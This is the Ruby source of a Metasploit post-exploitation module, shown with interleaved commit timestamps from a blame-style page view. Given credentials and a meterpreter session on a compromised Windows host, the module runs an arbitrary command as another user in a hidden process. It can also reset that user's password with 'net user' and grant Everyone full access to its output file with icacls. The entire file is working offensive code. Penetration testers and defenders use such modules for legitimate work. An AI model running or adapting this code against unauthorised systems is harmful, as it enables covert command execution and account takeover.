metasploit-framework/modules/post/windows/manage/run_as.rb

129 lines
4.4 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Post
2013-08-30 21:28:54 +00:00
include Msf::Post::File
include Msf::Post::Windows::Priv
2015-01-27 16:14:59 +00:00
include Msf::Post::Windows::Runas
2013-08-30 21:28:54 +00:00
2015-01-27 16:34:52 +00:00
def initialize(info = {})
2013-08-30 21:28:54 +00:00
super(update_info(info,
'Name' => "Windows Manage Run Command As User",
2015-01-27 16:34:52 +00:00
'Description' => %q(
2013-08-30 21:28:54 +00:00
This module will login with the specified username/password and execute the
supplied command as a hidden process. Output is not returned by default, by setting
CMDOUT to false output will be redirected to a temp file and read back in to
display.By setting advanced option SETPASS to true, it will reset the users
password and then execute the command.
2015-01-27 16:34:52 +00:00
),
2013-08-30 21:28:54 +00:00
'License' => MSF_LICENSE,
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Author' => ['Kx499']
))
register_options(
[
2015-01-27 16:14:59 +00:00
OptString.new('DOMAIN', [true, 'Domain to login with' ]),
OptString.new('USER', [true, 'Username to login with' ]),
OptString.new('PASSWORD', [true, 'Password to login with' ]),
2013-08-30 21:28:54 +00:00
OptString.new('CMD', [true, 'Command to execute' ]),
2015-01-27 16:34:52 +00:00
OptBool.new('CMDOUT', [true, 'Retrieve command output', false])
2013-08-30 21:28:54 +00:00
], self.class)
register_advanced_options(
[
2015-01-27 16:14:59 +00:00
OptBool.new('SETPASS', [true, 'Reset password', false])
2013-08-30 21:28:54 +00:00
], self.class)
end
# Check if sufficient privileges are present for certain actions and run getprivs for system
# If you elevated privs to system,the SeAssignPrimaryTokenPrivilege will not be assigned. You
# need to migrate to a process that is running as
# system. If you don't have privs, this exits script.
def priv_check
if is_system?
privs = session.sys.config.getprivs
2015-01-27 16:14:59 +00:00
return privs.include?("SeAssignPrimaryTokenPrivilege") && privs.include?("SeIncreaseQuotaPrivilege")
2013-08-30 21:28:54 +00:00
end
2015-01-27 16:14:59 +00:00
false
2013-08-30 21:28:54 +00:00
end
2015-01-27 16:14:59 +00:00
def reset_pass(user, password)
2013-08-30 21:28:54 +00:00
begin
2015-01-27 16:14:59 +00:00
tmpout = cmd_exec("cmd.exe /c net user #{user} #{password}")
return tmpout.include?("successfully")
2013-08-30 21:28:54 +00:00
rescue
return false
end
end
2015-01-27 16:14:59 +00:00
def touch(path)
write_file(path, "")
cmd_exec("icacls #{path} /grant Everyone:(F)")
end
2013-08-30 21:28:54 +00:00
2015-01-27 16:14:59 +00:00
def run
2013-08-30 21:28:54 +00:00
# Make sure we meet the requirements before running the script, note no need to return
# unless error
2015-01-27 16:14:59 +00:00
return unless session.type == "meterpreter"
2013-08-30 21:28:54 +00:00
2015-01-27 16:14:59 +00:00
pi = nil
2013-08-30 21:28:54 +00:00
# check/set vars
setpass = datastore["SETPASS"]
cmdout = datastore["CMDOUT"]
user = datastore["USER"] || nil
2015-01-27 16:14:59 +00:00
password = datastore["PASSWORD"] || nil
2013-08-30 21:28:54 +00:00
cmd = datastore["CMD"] || nil
2015-01-27 16:14:59 +00:00
domain = datastore['DOMAIN']
2013-08-30 21:28:54 +00:00
2015-01-27 16:14:59 +00:00
if setpass
2013-08-30 21:28:54 +00:00
print_status("Setting user password")
2015-04-16 19:44:56 +00:00
fail_with(Failure::Unknown, 'Error resetting password') unless reset_pass(user, password)
2013-08-30 21:28:54 +00:00
end
2015-01-27 16:14:59 +00:00
system_temp = get_env('WINDIR') << '\\Temp'
outpath = "#{system_temp}\\#{Rex::Text.rand_text_alpha(8)}.txt"
2013-08-30 21:28:54 +00:00
2015-01-27 16:14:59 +00:00
# Create output file and set permissions so everyone can access
touch(outpath)
2013-08-30 21:28:54 +00:00
cmdstr = "cmd.exe /c #{cmd}"
cmdstr = "cmd.exe /c #{cmd} > #{outpath}" if cmdout
2015-01-27 16:14:59 +00:00
2013-08-30 21:28:54 +00:00
# Check privs and execute the correct commands
2015-01-27 16:14:59 +00:00
# if user use createprocesswithlogon, if system logonuser and createprocessasuser
2013-08-30 21:28:54 +00:00
# execute command and get output with a poor mans pipe
if priv_check
2015-01-27 16:14:59 +00:00
print_status("Executing CreateProcessAsUserA...we are SYSTEM")
pi = create_process_as_user(domain, user, password, nil, cmdstr)
if pi
2015-01-27 16:34:52 +00:00
session.railgun.kernel32.CloseHandle(pi[:process_handle])
session.railgun.kernel32.CloseHandle(pi[:thread_handle])
end
2013-08-30 21:28:54 +00:00
else
2015-01-27 16:14:59 +00:00
print_status("Executing CreateProcessWithLogonW...")
pi = create_process_with_logon(domain, user, password, nil, cmdstr)
2013-08-30 21:28:54 +00:00
end
# Only process file if the process creation was successful, delete when done, give us info
# about process
2015-01-27 16:14:59 +00:00
if pi
tmpout = read_file(outpath) if cmdout
2013-08-30 21:28:54 +00:00
print_status("Command Run: #{cmdstr}")
2015-01-27 16:14:59 +00:00
vprint_status("Process Handle: #{pi[:process_handle]}")
vprint_status("Thread Handle: #{pi[:thread_handle]}")
vprint_status("Process Id: #{pi[:process_id]}")
vprint_status("Thread Id: #{pi[:thread_id]}")
print_status("Command output:\r\n#{tmpout}") unless tmpout.nil?
2013-08-30 21:28:54 +00:00
end
end
end